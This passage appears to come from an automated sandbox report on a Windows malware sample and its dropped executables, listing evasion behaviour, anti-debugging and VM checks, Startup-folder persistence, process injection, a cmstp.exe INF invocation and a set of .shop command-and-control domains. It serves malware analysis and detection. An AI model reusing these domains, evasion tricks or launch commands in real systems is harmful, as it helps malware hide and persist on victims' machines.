                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 180Thread sleep time: -136068s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 428Thread sleep count: 68 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 428Thread sleep time: -136068s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599890s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599781s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599672s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599562s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599453s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599343s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599234s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599125s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598992s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598797s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598625s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598515s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598406s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598290s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598161s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598011s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597906s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597791s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597673s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597531s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597422s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597310s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597196s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597078s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596967s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596858s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596745s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596636s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596500s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596078s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595875s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595731s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595607s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595468s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595299s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595156s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595030s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594920s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594812s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594702s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594593s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594484s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594375s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594265s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594156s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594047s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593936s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593778s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593625s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593323s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593202s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593094s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep count: 37 > 30
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -34126476536362649s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -60000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -59875s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7400Thread sleep count: 5081 > 30
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7400Thread sleep count: 4734 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 5724 Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 4948 Thread sleep time: -38019s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 344 Thread sleep time: -58029s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 7352 Thread sleep time: -40000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 5260 Thread sleep time: -240000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 3804 Thread sleep time: -70035s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 2504 Thread sleep time: -54027s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 2896 Thread sleep time: -66033s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 1772 Thread sleep time: -68034s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 2032 Thread sleep time: -66033s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848 Thread sleep count: 5597 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848 Thread sleep count: 4178 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176 Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe TID: 6948 Thread sleep count: 31 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe TID: 6948 Thread sleep time: -28592453314249787s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe TID: 6864 Thread sleep count: 3538 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe TID: 6864 Thread sleep count: 4893 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe TID: 6948 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 3964 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe TID: 2912 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe TID: 6164 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe TID: 7976 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Last function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe File opened: C:\Users\user\AppData\
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe File opened: C:\Users\user\
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                          Source: skotes.exe, skotes.exe, 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmp, e44fda3216.exe, 0000000B.00000002.3305605418.0000000000E51000.00000040.00000001.01000000.00000012.sdmp, e44fda3216.exe, 0000000B.00000002.3327618857.0000000005D35000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: NzL6O1Q.exe, 00000014.00000002.3302368508.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                          Source: db3cab6cee.exe, 00000037.00000002.3302081297.000001E194EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
                          Source: e44fda3216.exe, 0000000B.00000002.3295906531.00000000005AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: file.exe, 00000000.00000003.1682449990.000000000137A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: e44fda3216.exe, 0000000B.00000002.3295906531.000000000057A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                          Source: svchost.exe, 0000000A.00000002.3320594671.0000026F1B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3339501568.0000026F20A52000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3316261119.0000022087A5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                          Source: e44fda3216.exe, 0000000B.00000002.3295906531.00000000005AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: e44fda3216.exe, 0000000B.00000002.3295906531.00000000005AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW}
                          Source: file.exe, 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmp, e44fda3216.exe, 0000000B.00000002.3305605418.0000000000E51000.00000040.00000001.01000000.00000012.sdmp, e44fda3216.exe, 0000000B.00000002.3327618857.0000000005D35000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                          Source: svchost.exe, 00000035.00000002.3315665185.0000022087A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                          Source: 9LbUK15.exe, 00000006.00000002.3303779403.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                          Source: NzL6O1Q.exe, 0000001E.00000002.2504235326.0000000001320000.00000004.00000020.00020000.00000000.sdmp, NzL6O1Q.exe, 00000036.00000002.2623718238.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: svchost.exe, 00000035.00000002.3317388206.0000022087A6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP UDP Service Provider
                          Source: e44fda3216.exe, 0000000B.00000003.2750455557.000000000060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__"fs"
                          Source: NzL6O1Q.exe, 00000038.00000002.2731408286.0000000000DF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOO
                          Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                          Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                          Anti Debugging

                          Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Open window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Open window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Open window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Open window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Open window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe File opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe File opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe File opened: SIWVID
                          Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Process queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05050000 rdtsc 0_2_05050000
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E8652B mov eax, dword ptr fs:[00000030h] 0_2_00E8652B
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E8A302 mov eax, dword ptr fs:[00000030h] 0_2_00E8A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0043A302 mov eax, dword ptr fs:[00000030h] 1_2_0043A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0043652B mov eax, dword ptr fs:[00000030h] 1_2_0043652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0043A302 mov eax, dword ptr fs:[00000030h] 5_2_0043A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0043652B mov eax, dword ptr fs:[00000030h] 5_2_0043652B
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: robinsharez.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: handscreamny.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: chipdonkeruz.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: versersleep.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: crowdwarek.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: apporholis.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: femalsabler.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: soundtappysk.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: letterdrive.shop
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe Thread register set: target process: 6192
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe Thread register set: target process: 6596
                          Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe "C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe "C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe "C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe "C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Process created: C:\Windows\SysWOW64\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.inf
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe"
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Process created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
